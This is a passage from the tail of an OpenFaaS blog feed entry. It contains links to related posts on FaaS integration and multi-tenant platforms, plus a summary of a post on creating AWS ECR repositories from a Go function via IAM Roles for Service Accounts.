  <li>High-level overview and customer stories - <a href="https://www.openfaas.com/blog/add-a-faas-capability/">Integrate FaaS Capabilities into Your Platform with OpenFaaS</a>.</li>
  <li>Deep dive into technical details - <a href="https://www.openfaas.com/blog/build-a-multi-tenant-functions-platform/">Build a multi-tenant functions platform</a>.</li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="aws" /><category term="identity" /><category term="rbac" /><summary type="html"><![CDATA[We show you how to create AWS ECR repositories from a function written in Go using IAM Roles for Service Accounts.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-07-irsa/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-07-irsa/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>